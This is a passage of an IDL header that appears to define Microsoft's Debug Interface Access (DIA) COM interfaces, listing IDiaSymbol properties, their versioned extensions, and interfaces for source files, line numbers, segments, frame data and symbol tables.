PROPERTY_RO( DWORD, language, 22, ".");
PROPERTY_RO( BOOL, editAndContinueEnabled, 23, ".");
PROPERTY_RO( DWORD, frontEndMajor, 24, ".");
PROPERTY_RO( DWORD, frontEndMinor, 25, ".");
PROPERTY_RO( DWORD, frontEndBuild, 26, ".");
PROPERTY_RO( DWORD, backEndMajor, 27, ".");
PROPERTY_RO( DWORD, backEndMinor, 28, ".");
PROPERTY_RO( DWORD, backEndBuild, 29, ".");
PROPERTY_RO( BSTR, sourceFileName, 30, ".");
PROPERTY_RO( BSTR, unused, 31, ".");
PROPERTY_RO( DWORD, thunkOrdinal, 32, ".");
PROPERTY_RO( LONG, thisAdjust, 33, ".");
PROPERTY_RO( DWORD, virtualBaseOffset, 34, ".");
PROPERTY_RO( BOOL, virtual, 35, ".");
PROPERTY_RO( BOOL, intro, 36, ".");
PROPERTY_RO( BOOL, pure, 37, ".");
PROPERTY_RO( DWORD, callingConvention, 38, ".");
PROPERTY_RO( VARIANT, value, 39, ".");
PROPERTY_RO( DWORD, baseType, 40, ".");
PROPERTY_RO( DWORD, token, 41, ".");
PROPERTY_RO( DWORD, timeStamp, 42, ".");
PROPERTY_RO( GUID, guid, 43, ".");
PROPERTY_RO( BSTR, symbolsFileName, 44, ".");
PROPERTY_RO( BOOL, reference, 46, "L-value Reference");
PROPERTY_RO( DWORD, count, 47, ".");
PROPERTY_RO( DWORD, bitPosition, 49, ".");
PROPERTY_RO( IDiaSymbol*, arrayIndexType, 50, ".");
PROPERTY_RO( BOOL, packed, 51, ".");
PROPERTY_RO( BOOL, constructor, 52, "UDT has constructor or destructor, or func is a constructor");
PROPERTY_RO( BOOL, overloadedOperator, 53, ".");
PROPERTY_RO( BOOL, nested, 54, ".");
PROPERTY_RO( BOOL, hasNestedTypes, 55, ".");
PROPERTY_RO( BOOL, hasAssignmentOperator, 56, ".");
PROPERTY_RO( BOOL, hasCastOperator, 57, ".");
PROPERTY_RO( BOOL, scoped, 58, ".");
PROPERTY_RO( BOOL, virtualBaseClass, 59, ".");
PROPERTY_RO( BOOL, indirectVirtualBaseClass, 60, ".");
PROPERTY_RO( LONG, virtualBasePointerOffset, 61, ".");
PROPERTY_RO( IDiaSymbol*, virtualTableShape, 62, ".");
PROPERTY_RO( DWORD, lexicalParentId, 64, "Lexical parent symbol.");
PROPERTY_RO( DWORD, classParentId, 65, ".");
PROPERTY_RO( DWORD, typeId, 66, ".");
PROPERTY_RO( DWORD, arrayIndexTypeId, 67, ".");
PROPERTY_RO( DWORD, virtualTableShapeId, 68, ".");
PROPERTY_RO( BOOL, code, 69, "Symbol refers to a code address." );
PROPERTY_RO( BOOL, function, 70, "Symbol refers to a function." );
PROPERTY_RO( BOOL, managed, 71, "Symbol refers to managed code." );
PROPERTY_RO( BOOL, msil, 72, "Symbol refers to MSIL code." );
PROPERTY_RO( DWORD, virtualBaseDispIndex, 73, ".");
PROPERTY_RO( BSTR, undecoratedName, 74, ".");
PROPERTY_RO( DWORD, age, 75, "PDB file age." );
PROPERTY_RO( DWORD, signature, 76, "Signature." );
PROPERTY_RO( BOOL, compilerGenerated, 77, "Symbol or function is compiler generated." );
PROPERTY_RO( BOOL, addressTaken, 78, "Symbol is address taken." );
PROPERTY_RO( DWORD, rank, 79, "Rank of FORTRAN multi-dimension array." );
PROPERTY_RO( IDiaSymbol*, lowerBound, 80, "Lower bound of a FORTRAN array dimension.");
PROPERTY_RO( IDiaSymbol*, upperBound, 81, "Upper bound of a FORTRAN array dimension.");
PROPERTY_RO( DWORD, lowerBoundId, 82, "Symbol Id of the lower bound of a FORTRAN array dimension.");
PROPERTY_RO( DWORD, upperBoundId, 83, "Symbol Id of the upper bound of a FORTRAN array dimension.");
HRESULT get_dataBytes(
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData
);
HRESULT findChildren(
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[out] IDiaEnumSymbols** ppResult );
HRESULT findChildrenEx(
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[out] IDiaEnumSymbols** ppResult );
HRESULT findChildrenExByAddr(
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[in] DWORD isect,
[in] DWORD offset,
[out] IDiaEnumSymbols** ppResult );
HRESULT findChildrenExByVA(
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[in] ULONGLONG va,
[out] IDiaEnumSymbols** ppResult );
HRESULT findChildrenExByRVA(
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[in] DWORD rva,
[out] IDiaEnumSymbols** ppResult );
PROPERTY_RO( DWORD, targetSection, 84, "Thunk target address section.");
PROPERTY_RO( DWORD, targetOffset, 85, "Thunk target address offset.");
PROPERTY_RO( DWORD, targetRelativeVirtualAddress, 86, "Thunk target RVA.");
PROPERTY_RO( ULONGLONG, targetVirtualAddress, 87, "Thunk target virtual address.");
PROPERTY_RO( DWORD, machineType, 88, "Target machine type." );
PROPERTY_RO( DWORD, oemId, 89, "Identifier of manufacturer.");
PROPERTY_RO( DWORD, oemSymbolId, 90, "Manufacturer defined custom symbol identifier." );
HRESULT get_types(
[in] DWORD cTypes,
[out] DWORD *pcTypes,
[out, size_is(cTypes, )] IDiaSymbol**pTypes
);
HRESULT get_typeIds(
[in] DWORD cTypeIds,
[out] DWORD *pcTypeIds,
[out, size_is(cTypeIds)] DWORD *pdwTypeIds
);
PROPERTY_RO(IDiaSymbol*, objectPointerType, 91, "Type of method's object pointer.");
PROPERTY_RO(DWORD, udtKind, 92, "struct, union, class or interface");
HRESULT get_undecoratedNameEx(
[in] DWORD undecorateOptions,
[out] BSTR* name
);
PROPERTY_RO(BOOL, noReturn, 93, "NoReturn");
PROPERTY_RO(BOOL, customCallingConvention, 94, "uses custom calling convention");
PROPERTY_RO(BOOL, noInline, 95, "NoInline");
PROPERTY_RO(BOOL, optimizedCodeDebugInfo, 96, "has debugging Info for optimized code");
PROPERTY_RO(BOOL, notReached, 97, "Unreachable");
PROPERTY_RO(BOOL, interruptReturn, 98, "return from interrupt");
PROPERTY_RO(BOOL, farReturn, 99, "far return");
PROPERTY_RO(BOOL, isStatic, 100, "static function");
PROPERTY_RO(BOOL, hasDebugInfo, 101, "hasDebugInfo");
PROPERTY_RO(BOOL, isLTCG, 102, "Compiled With LTCG");
PROPERTY_RO(BOOL, isDataAligned, 103, "Is it compiled with -Bzalign");
PROPERTY_RO(BOOL, hasSecurityChecks, 104, "hasSecurityChecks");
PROPERTY_RO(BSTR, compilerName, 105, "compiler name");
PROPERTY_RO(BOOL, hasAlloca, 106, "hasAlloca");
PROPERTY_RO(BOOL, hasSetJump, 107, "hasSetJump");
PROPERTY_RO(BOOL, hasLongJump, 108, "hasLongJump");
PROPERTY_RO(BOOL, hasInlAsm, 109, "hasInlineAssembly");
PROPERTY_RO(BOOL, hasEH, 110, "hasC++EH");
PROPERTY_RO(BOOL, hasSEH, 111, "hasStructuredEH");
PROPERTY_RO(BOOL, hasEHa, 112, "hasAsynchronousEH");
PROPERTY_RO(BOOL, isNaked, 113, "IsNaked");
PROPERTY_RO(BOOL, isAggregated, 114, "isAggregated");
PROPERTY_RO(BOOL, isSplitted, 115, "isSplitted");
PROPERTY_RO(IDiaSymbol *, container, 116, "container");
PROPERTY_RO(BOOL, inlSpec, 117, "WasSpecifiedAsInline");
PROPERTY_RO(BOOL, noStackOrdering, 118, "BufferChecksWithoutOrdering");
PROPERTY_RO(IDiaSymbol *, virtualBaseTableType, 119, "Type of Virtual Base Offset Table");
PROPERTY_RO(BOOL, hasManagedCode, 120, "hasManagedCode");
PROPERTY_RO(BOOL, isHotpatchable, 121, "isHotpatchable");
PROPERTY_RO(BOOL, isCVTCIL, 122, "isCVTCIL");
PROPERTY_RO(BOOL, isMSILNetmodule, 123, "isMSILNetmodule");
PROPERTY_RO(BOOL, isCTypes, 124, "isCTypes");
PROPERTY_RO(BOOL, isStripped, 125, "isStripped");
PROPERTY_RO(DWORD, frontEndQFE, 126, ".");
PROPERTY_RO(DWORD, backEndQFE, 127, ".");
PROPERTY_RO(BOOL, wasInlined, 128, "WasInlined");
PROPERTY_RO(BOOL, strictGSCheck, 129, "StrictGSCheck");
PROPERTY_RO(BOOL, isCxxReturnUdt, 130, "return C++ style UDT");
PROPERTY_RO(BOOL, isConstructorVirtualBase, 131, "instance constructor of a class with virtual base");
PROPERTY_RO(BOOL, RValueReference, 132, "R-value Reference");
PROPERTY_RO(IDiaSymbol*, unmodifiedType, 133, "unmodified type");
PROPERTY_RO(BOOL, framePointerPresent, 134, "frame pointer present");
PROPERTY_RO(BOOL, isSafeBuffers, 135, "isSafeBuffers");
PROPERTY_RO(BOOL, intrinsic, 136, "isIntrinsicType");
PROPERTY_RO(BOOL, sealed, 137, "can't be base class, or method can't be overridden");
PROPERTY_RO(BOOL, hfaFloat, 138, "HFA float");
PROPERTY_RO(BOOL, hfaDouble, 139, "HFA double");
PROPERTY_RO(DWORD, liveRangeStartAddressSection, 140, "LiveRangeStartAddressSection");
PROPERTY_RO(DWORD, liveRangeStartAddressOffset, 141, "LiveRangeStartAddressOffset");
PROPERTY_RO(DWORD, liveRangeStartRelativeVirtualAddress, 142, "LiveRangeStartRelativeVirtualAddress");
PROPERTY_RO(DWORD, countLiveRanges, 143, "number of live ranges");
PROPERTY_RO(ULONGLONG, liveRangeLength, 144, "length of live range");
PROPERTY_RO(DWORD, offsetInUdt, 145, "offset into UDT");
PROPERTY_RO(DWORD, paramBasePointerRegisterId, 146, "ID of the register holding base pointer to parameters");
PROPERTY_RO(DWORD, localBasePointerRegisterId, 147, "ID of the register holding base pointer to locals");
PROPERTY_RO(BOOL, isLocationControlFlowDependent, 148, "location is dependent on control flow");
PROPERTY_RO(DWORD, stride, 149, "stride");
PROPERTY_RO(DWORD, numberOfRows, 150, "number of rows in a matrix");
PROPERTY_RO(DWORD, numberOfColumns, 151, "number of columns in a matrix");
PROPERTY_RO(BOOL, isMatrixRowMajor, 152, "matrix is row major");
HRESULT get_numericProperties(
[in] DWORD cnt,
[out] DWORD *pcnt,
[out, size_is(cnt)] DWORD *pProperties
);
HRESULT get_modifierValues(
[in] DWORD cnt,
[out] DWORD *pcnt,
[out, size_is(cnt)] WORD *pModifiers
);
PROPERTY_RO(BOOL, isReturnValue, 153, "this variable holds return value");
PROPERTY_RO(BOOL, isOptimizedAway, 154, "this variable is optimized away");
PROPERTY_RO(DWORD, builtInKind, 155, "built in type kind");
PROPERTY_RO(DWORD, registerType, 156, "register type kind");
PROPERTY_RO(DWORD, baseDataSlot, 157, "base data slot");
PROPERTY_RO(DWORD, baseDataOffset, 158, "base data offset start");
PROPERTY_RO(DWORD, textureSlot, 159, "texture slot start");
PROPERTY_RO(DWORD, samplerSlot, 160, "sampler slot start");
PROPERTY_RO(DWORD, uavSlot, 161, "UAV slot start");
PROPERTY_RO(DWORD, sizeInUdt, 162, "size in UDT");
PROPERTY_RO(DWORD, memorySpaceKind, 163, "memory space kind");
PROPERTY_RO(DWORD, unmodifiedTypeId, 164, "unmodified type ID");
PROPERTY_RO(DWORD, subTypeId, 165, "sub type ID");
PROPERTY_RO(IDiaSymbol*, subType, 166, "sub type");
PROPERTY_RO(DWORD, numberOfModifiers, 167, "number of modifiers");
PROPERTY_RO(DWORD, numberOfRegisterIndices, 168, "number of HLSL register indices");
PROPERTY_RO(BOOL, isHLSLData, 169, "is HLSL data");
PROPERTY_RO(BOOL, isPointerToDataMember, 170, "is pointer to data member");
PROPERTY_RO(BOOL, isPointerToMemberFunction, 171, "is pointer to member function");
PROPERTY_RO(BOOL, isSingleInheritance, 172, "is single inheritance");
PROPERTY_RO(BOOL, isMultipleInheritance, 173, "is multiple inheritance");
PROPERTY_RO(BOOL, isVirtualInheritance, 174, "is virtual inheritance");
PROPERTY_RO(BOOL, restrictedType, 175, ".");
PROPERTY_RO(BOOL, isPointerBasedOnSymbolValue, 176, "pointer based on value of a symbol");
PROPERTY_RO(IDiaSymbol*, baseSymbol, 177, "base symbol for base pointer");
PROPERTY_RO(DWORD, baseSymbolId, 178, "ID of base symbol for base pointer");
PROPERTY_RO(BSTR, objectFileName, 179, "object file name");
PROPERTY_RO(BOOL, isAcceleratorGroupSharedLocal, 180, "is Accelerator group shared local");
PROPERTY_RO(BOOL, isAcceleratorPointerTagLiveRange, 181, "is live range of Accelerator pointer tag");
PROPERTY_RO(BOOL, isAcceleratorStubFunction, 182, "is Accelerator stub function");
PROPERTY_RO(DWORD, numberOfAcceleratorPointerTags, 183, "number of Accelerator pointer tags");
PROPERTY_RO(BOOL, isSdl, 184, "compiled with /sdl");
PROPERTY_RO(BOOL, isWinRTPointer, 185, "is WinRT pointer");
PROPERTY_RO(BOOL, isRefUdt, 186, "is ref class/struct");
PROPERTY_RO(BOOL, isValueUdt, 187, "is value class/struct");
PROPERTY_RO(BOOL, isInterfaceUdt, 188, "is interface class/struct");
HRESULT findInlineFramesByAddr(
[in] DWORD isect,
[in] DWORD offset,
[out] IDiaEnumSymbols** ppResult);
HRESULT findInlineFramesByRVA(
[in] DWORD rva,
[out] IDiaEnumSymbols** ppResult);
HRESULT findInlineFramesByVA(
[in] ULONGLONG va,
[out] IDiaEnumSymbols** ppResult);
HRESULT findInlineeLines(
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findInlineeLinesByAddr(
[in] DWORD isect,
[in] DWORD offset,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findInlineeLinesByRVA(
[in] DWORD rva,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findInlineeLinesByVA(
[in] ULONGLONG va,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findSymbolsForAcceleratorPointerTag(
[in] DWORD tagValue,
[out] IDiaEnumSymbols** ppResult);
HRESULT findSymbolsByRVAForAcceleratorPointerTag(
[in] DWORD tagValue,
[in] DWORD rva,
[out] IDiaEnumSymbols** ppResult);
HRESULT get_acceleratorPointerTags(
[in] DWORD cnt,
[out] DWORD *pcnt,
[out, size_is(cnt)] DWORD *pPointerTags);
HRESULT getSrcLineOnTypeDefn(
[out] IDiaLineNumber** ppResult);
PROPERTY_RO(BOOL, isPGO, 189, "is PGO enabled");
PROPERTY_RO(BOOL, hasValidPGOCounts, 190, "has valid PGO counts");
PROPERTY_RO(BOOL, isOptimizedForSpeed, 191, "is the function optimized for speed");
PROPERTY_RO(DWORD, PGOEntryCount, 192, "total invocation count in PGO training");
PROPERTY_RO(DWORD, PGOEdgeCount, 193, "edge count between a caller/callee and it's parent");
PROPERTY_RO(ULONGLONG, PGODynamicInstructionCount, 194, "dynamic instruction count calculated by training");
PROPERTY_RO(DWORD, staticSize, 195, "static instruction count");
PROPERTY_RO(DWORD, finalLiveStaticSize, 196, "final static size of live function, after inlining");
PROPERTY_RO(BSTR, phaseName, 197, "phase this function is a member of for PGO multiphased builds");
PROPERTY_RO(BOOL, hasControlFlowCheck, 198, "does this function contain control flow check");
PROPERTY_RO(BOOL, constantExport, 199, "export is CONSTANT");
PROPERTY_RO(BOOL, dataExport, 200, "export is CONSTANT");
PROPERTY_RO(BOOL, privateExport, 201, "export is PRIVATE");
PROPERTY_RO(BOOL, noNameExport, 202, "export is NONAME");
PROPERTY_RO(BOOL, exportHasExplicitlyAssignedOrdinal, 203, "export has explicitly assigned ordinal");
PROPERTY_RO(BOOL, exportIsForwarder, 204, "export is forwarder");
PROPERTY_RO(DWORD, ordinal, 205, "export ordinal");
PROPERTY_RO(DWORD, frameSize, 206, "frame size");
PROPERTY_RO(DWORD, exceptionHandlerAddressSection, 207, "section number of exception handler");
PROPERTY_RO(DWORD, exceptionHandlerAddressOffset, 208, "offset of exception handler");
PROPERTY_RO(DWORD, exceptionHandlerRelativeVirtualAddress, 209, "relative virtual address of exception handler");
PROPERTY_RO(ULONGLONG, exceptionHandlerVirtualAddress, 210, "virtual address of exception handler");
HRESULT findInputAssemblyFile(
[out] IDiaInputAssemblyFile** ppResult);
PROPERTY_RO(DWORD, characteristics, 211, "characteristics of a COFF group");
PROPERTY_RO(IDiaSymbol*, coffGroup, 212, "COFF group this symbol comes from");
PROPERTY_RO(DWORD, bindID, 213, "binding register index");
PROPERTY_RO(DWORD, bindSpace, 214, "binding space");
PROPERTY_RO(DWORD, bindSlot, 215, "binding lower bound");
};
[
object,
uuid(611e86cd-b7d1-4546-8a15-070e2b07a427),
local,
helpstring("IDiaSymbol2 Interface"),
pointer_default(unique)
]
interface IDiaSymbol2 : IDiaSymbol
{
PROPERTY_RO(BOOL, isObjCClass, 216, "is objective-c class interface/implementation");
PROPERTY_RO(BOOL, isObjCCategory, 217, "is objective-c category");
PROPERTY_RO(BOOL, isObjCProtocol, 218, "is objective-c protocol");
};
[
object,
uuid(99b665f7-c1b2-49d3-89b2-a384361acab5),
local,
helpstring("IDiaSymbol3 Interface"),
pointer_default(unique)
]
interface IDiaSymbol3 : IDiaSymbol2
{
PROPERTY_RO(IDiaSymbol*, inlinee, 219, "inlinee");
PROPERTY_RO(DWORD, inlineeId, 220, "inlinee ID");
};
[
object,
uuid(bf6c88a7-e9d6-4346-99a1-d053de5a7808),
local,
helpstring("IDiaSymbol4 Interface"),
pointer_default(unique)
]
interface IDiaSymbol4 : IDiaSymbol3
{
PROPERTY_RO(BOOL, noexcept, 221, "noexcept");
};
[
object,
uuid(abe2de00-dc2d-4793-af9a-ef1d90832644),
local,
helpstring("IDiaSymbol5 Interface"),
pointer_default(unique)
]
interface IDiaSymbol5 : IDiaSymbol4
{
PROPERTY_RO(BOOL, hasAbsoluteAddress, 222, "absolute address");
};
[
object,
uuid(8133dad3-75fe-4234-ac7e-f8e7a1d3cbb3),
local,
helpstring("IDiaSymbol6 Interface"),
pointer_default(unique)
]
interface IDiaSymbol6 : IDiaSymbol5
{
PROPERTY_RO(BOOL, isStaticMemberFunc, 223, "static member function");
};
[
object,
uuid(64ce6cd5-7315-4328-86d6-10e303e010b4),
local,
helpstring("IDiaSymbol7 Interface"),
pointer_default(unique)
]
interface IDiaSymbol7 : IDiaSymbol6
{
PROPERTY_RO(BOOL, isSignRet, 224, "function signs return address");
};
[
object,
uuid(7f2e041f-1294-41bd-b83a-e715972d2ce3),
local,
helpstring("IDiaSymbol8 Interface"),
pointer_default(unique)
]
interface IDiaSymbol8 : IDiaSymbol7
{
PROPERTY_RO(DWORD, coroutineKind, 225, "coroutine function kind");
PROPERTY_RO(DWORD, associatedSymbolKind, 226, "associated symbol kind");
PROPERTY_RO(DWORD, associatedSymbolSection, 227, "associated symbol section");
PROPERTY_RO(DWORD, associatedSymbolOffset, 228, "associated symbol offset");
PROPERTY_RO(DWORD, associatedSymbolRva, 229, "associated symbol RVA");
PROPERTY_RO(ULONGLONG, associatedSymbolAddr, 230, "associated symbol VA");
};
[
object,
uuid(a89e5969-92a1-4f8a-b704-00121c37abbb),
local,
helpstring("IDiaSymbol9 Interface"),
pointer_default(unique)
]
interface IDiaSymbol9 : IDiaSymbol8
{
// stack frame padding is used for EnC (/ZI)
PROPERTY_RO(DWORD, framePadSize, 231, "stack frame pad size");
PROPERTY_RO(DWORD, framePadOffset, 232, "stack frame pad offset");
// this property is currently used by the debugger to initialize the stack
PROPERTY_RO(BOOL, isRTCs, 233, "compiled with runtime stack checks");
};
[
object,
uuid(9034a70b-b0b7-4605-8a97-33772f3a7b8c),
local,
helpstring("IDiaSymbol10 Interface"),
pointer_default(unique)
]
interface IDiaSymbol10 : IDiaSymbol9
{
HRESULT get_sourceLink(
[in] DWORD cb,
[out] DWORD *pcb,
[out, size_is(cb)] BYTE *pb);
};
//
// SourceFiles
//
[
object,
uuid(A2EF5353-F5A8-4eb3-90D2-CB526ACB3CDD),
local,
helpstring("IDiaSourceFile Interface"),
pointer_default(unique)
]
interface IDiaSourceFile: IUnknown
{
PROPERTY_RO( DWORD, uniqueId, 2, "Unique id for the source file (in this data store)." );
PROPERTY_RO( BSTR, fileName, 3, "." );
PROPERTY_RO( DWORD, checksumType, 4, "." );
PROPERTY_RO( IDiaEnumSymbols*, compilands, 5, "." );
HRESULT get_checksum(
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData
);
};
//
// InputAssemblyFiles
//
[
object,
uuid(3BFE56B0-390C-4863-9430-1F3D083B7684),
local,
helpstring("IDiaInputAssemblyFile Interface"),
pointer_default(unique)
]
interface IDiaInputAssemblyFile: IUnknown
{
PROPERTY_RO( DWORD, uniqueId, 1, "assembly file ID" );
PROPERTY_RO( DWORD, index, 2, "assembly file index");
PROPERTY_RO( DWORD, timestamp, 3, "time stamp");
PROPERTY_RO( BOOL, pdbAvailableAtILMerge, 4, "PDB is available at IL merge time" );
PROPERTY_RO( BSTR, fileName, 5, "assembly file name" );
HRESULT get_version(
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData
);
};
//
// LineNumbers
//
[
object,
uuid(B388EB14-BE4D-421d-A8A1-6CF7AB057086),
local,
helpstring("IDiaLineNumber Interface"),
pointer_default(unique)
]
interface IDiaLineNumber: IUnknown
{
PROPERTY_RO( IDiaSymbol*, compiland, 1, "." );
PROPERTY_RO( IDiaSourceFile*, sourceFile, 2, "." );
PROPERTY_RO( DWORD, lineNumber, 3, "." );
PROPERTY_RO( DWORD, lineNumberEnd, 4, "." );
PROPERTY_RO( DWORD, columnNumber, 5, "." );
PROPERTY_RO( DWORD, columnNumberEnd, 6, "." );
PROPERTY_RO( DWORD, addressSection, 7, "." );
PROPERTY_RO( DWORD, addressOffset, 8, "." );
PROPERTY_RO( DWORD, relativeVirtualAddress, 9, "." );
PROPERTY_RO( ULONGLONG, virtualAddress, 10, "." );
PROPERTY_RO( DWORD, length, 11, "." );
PROPERTY_RO( DWORD, sourceFileId, 12, "." );
PROPERTY_RO( BOOL, statement, 13, "." );
PROPERTY_RO( DWORD, compilandId, 14, "." );
};
//
// SectionContributions
//
[
object,
uuid(0CF4B60E-35B1-4c6c-BDD8-854B9C8E3857),
local,
helpstring("IDiaSectionContrib Interface"),
pointer_default(unique)
]
interface IDiaSectionContrib: IUnknown
{
PROPERTY_RO( IDiaSymbol*, compiland, 1, "." );
PROPERTY_RO( DWORD, addressSection, 2, "." );
PROPERTY_RO( DWORD, addressOffset, 3, "." );
PROPERTY_RO( DWORD, relativeVirtualAddress, 4, "." );
PROPERTY_RO( ULONGLONG, virtualAddress, 5, "." );
PROPERTY_RO( DWORD, length, 6, "." );
// 7
PROPERTY_RO( BOOL, notPaged, 8, ".");
PROPERTY_RO( BOOL, code, 9, ".");
PROPERTY_RO( BOOL, initializedData, 10, ".");
PROPERTY_RO( BOOL, uninitializedData, 11, ".");
PROPERTY_RO( BOOL, remove, 12, ".");
PROPERTY_RO( BOOL, comdat, 13, ".");
PROPERTY_RO( BOOL, discardable, 14, ".");
PROPERTY_RO( BOOL, notCached, 15, ".");
PROPERTY_RO( BOOL, share, 16, ".");
PROPERTY_RO( BOOL, execute, 17, ".");
PROPERTY_RO( BOOL, read, 18, ".");
PROPERTY_RO( BOOL, write, 19, ".");
PROPERTY_RO( DWORD, dataCrc, 20, "." );
PROPERTY_RO( DWORD, relocationsCrc, 21, "." );
PROPERTY_RO( DWORD, compilandId, 22, "." );
PROPERTY_RO( BOOL, code16bit, 23, ".");
};
//
// SegmentMap
//
[
object,
uuid(0775B784-C75B-4449-848B-B7BD3159545B),
local,
helpstring("IDiaSegment Interface"),
pointer_default(unique)
]
interface IDiaSegment: IUnknown
{
PROPERTY_RO( DWORD, frame, 1, "Frame." );
PROPERTY_RO( DWORD, offset, 2, "Offset in physical section." );
PROPERTY_RO( DWORD, length, 3, "Length in bytes of segment." );
PROPERTY_RO( BOOL, read, 4, "Read allowed." );
PROPERTY_RO( BOOL, write, 5, "Write allowed." );
PROPERTY_RO( BOOL, execute, 6, "Execute allowed." );
PROPERTY_RO( DWORD, addressSection, 7, "." );
PROPERTY_RO( DWORD, relativeVirtualAddress, 8, "." );
PROPERTY_RO( ULONGLONG, virtualAddress, 9, "." );
};
//
// InjectedSource
//
[
object,
uuid(AE605CDC-8105-4a23-B710-3259F1E26112),
local,
helpstring("IDiaInjectedSource Interface"),
pointer_default(unique)
]
interface IDiaInjectedSource: IUnknown
{
PROPERTY_RO( DWORD, crc, 1, "CRC of source bytes." );
PROPERTY_RO( ULONGLONG, length, 2, "Length of source in bytes." );
PROPERTY_RO( BSTR, filename, 3, "Source filename." );
PROPERTY_RO( BSTR, objectFilename, 4, "Object filename." );
PROPERTY_RO( BSTR, virtualFilename, 5, "Virtual filename." );
PROPERTY_RO( DWORD, sourceCompression, 6, "Source compression algorithm." );
HRESULT get_source(
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData
);
};
//
// Errors returned by IDiaFrameData::execute
//
enum
{
E_DIA_INPROLOG // cannot execute stack frame when in prolog
=((HRESULT) (((unsigned long)(1)<<31) | ((unsigned long)(((LONG)0x6d))<<16) | ((unsigned long)(100))) ),
E_DIA_SYNTAX, // error parsing frame program
E_DIA_FRAME_ACCESS, // error accessing registers or memory
E_DIA_VALUE, // error in computer a value (e.g., divide by zero)
};
[
object,
uuid(07C590C1-438D-4F47-BDCD-4397BC81AD75),
local,
helpstring("IDiaStackWalkFrame Interface"),
pointer_default(unique)
]
interface IDiaStackWalkFrame: IUnknown
{
PROPERTY_ARRAY_RW( ULONGLONG, DWORD, registerValue, 1, "Register value." );
HRESULT readMemory(
[in] enum MemoryTypeEnum type,
[in] ULONGLONG va,
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData
);
HRESULT searchForReturnAddress(
[in] IDiaFrameData* frame,
[out] ULONGLONG* returnAddress
);
HRESULT searchForReturnAddressStart(
[in] IDiaFrameData* frame,
[in] ULONGLONG startAddress,
[out] ULONGLONG* returnAddress
);
};
[
object,
uuid(A39184B7-6A36-42de-8EEC-7DF9F3F59F33),
local,
helpstring("IDiaFrameData Interface"),
pointer_default(unique)
]
interface IDiaFrameData: IUnknown
{
PROPERTY_RO( DWORD, addressSection, 2, "." );
PROPERTY_RO( DWORD, addressOffset, 3, "." );
PROPERTY_RO( DWORD, relativeVirtualAddress, 4, "." );
PROPERTY_RO( ULONGLONG, virtualAddress, 5, "." );
PROPERTY_RO( DWORD, lengthBlock, 6, "." );
PROPERTY_RO( DWORD, lengthLocals, 7, "." );
PROPERTY_RO( DWORD, lengthParams, 8, "." );
PROPERTY_RO( DWORD, maxStack, 9, "." );
PROPERTY_RO( DWORD, lengthProlog, 10, "." );
PROPERTY_RO( DWORD, lengthSavedRegisters, 11, "." );
PROPERTY_RO( BSTR, program, 12, "." );
PROPERTY_RO( BOOL, systemExceptionHandling, 13, "." );
PROPERTY_RO( BOOL, cplusplusExceptionHandling, 14, "." );
PROPERTY_RO( BOOL, functionStart, 15, "." );
PROPERTY_RO( BOOL, allocatesBasePointer, 16, "." );
PROPERTY_RO( DWORD, type, 17, "." );
PROPERTY_RO( IDiaFrameData*, functionParent, 18, "Frame data for enclosing function.");
HRESULT execute( IDiaStackWalkFrame* frame );
}
//
// IDiaImageData
//
// Some debug streams (XDATA, PDATA) contain copies of data also stored in the image. The
// stream data objects (IDiaEnumDebugStreamData) can be QI'ed for their IDiaImageData.
[
object,
uuid(C8E40ED2-A1D9-4221-8692-3CE661184B44),
local,
helpstring("IDiaImageData Interface"),
pointer_default(unique)
]
interface IDiaImageData: IUnknown
{
PROPERTY_RO( DWORD, relativeVirtualAddress, 2, "." );
PROPERTY_RO( ULONGLONG, virtualAddress, 3, "." );
PROPERTY_RO( ULONGLONG, imageBase, 4, "." );
}
//
// IDiaTable
// Supports enumerating the members of the table
//
[
object,
uuid(4A59FB77-ABAC-469b-A30B-9ECC85BFEF14),
local,
helpstring("IDiaTable Interface"),
pointer_default(unique)
]
interface IDiaTable: IEnumUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaTable." );
PROPERTY_RO( BSTR, name, 1, "Table name." );
PROPERTY_RO( LONG, Count, 2, "Number of table entries." );
[id(0), helpstring("Return the table element for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IUnknown **element); // ### IDispatch?
};
[
object,
uuid(C65C2B0A-1150-4d7a-AFCC-E05BF3DEE81E),
local,
helpstring("IDiaEnumTables Interface"),
pointer_default(unique)
]
interface IDiaEnumTables: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumTables." );
PROPERTY_RO( LONG, Count, 1, "Number of tables." );
[id(0), helpstring("Return the table for the given index or name.")]
HRESULT Item([in] VARIANT index, [out, retval]IDiaTable **table);
HRESULT Next(
ULONG celt,
IDiaTable ** rgelt,
ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumTables **ppenum);
};
[
uuid(106173A0-0173-4e5c-84E7-E915422BE997),
version(2.0),
helpstring("dia 2.0 Type Library")
]
library Dia2Lib
{
importlib("stdole2.tlb");
[
uuid(e6756135-1e65-4d17-8576-610761398c3c),
helpstring("DiaSource Class")
]
coclass DiaSource
{
[default] interface IDiaDataSource;
};
//
// DiaSourceAlt - a DiaDataSource object that does not use the system heap.
//
// A process may either make DiaSourceAlt objects or DiaSource objects, but not both.
// When using DiaSourceAlt all returned BSTR's are really LPCOLESTR and should not be
// used with other BSTR management routines, in particular they must be released using
// LocalFree( bstr )
[
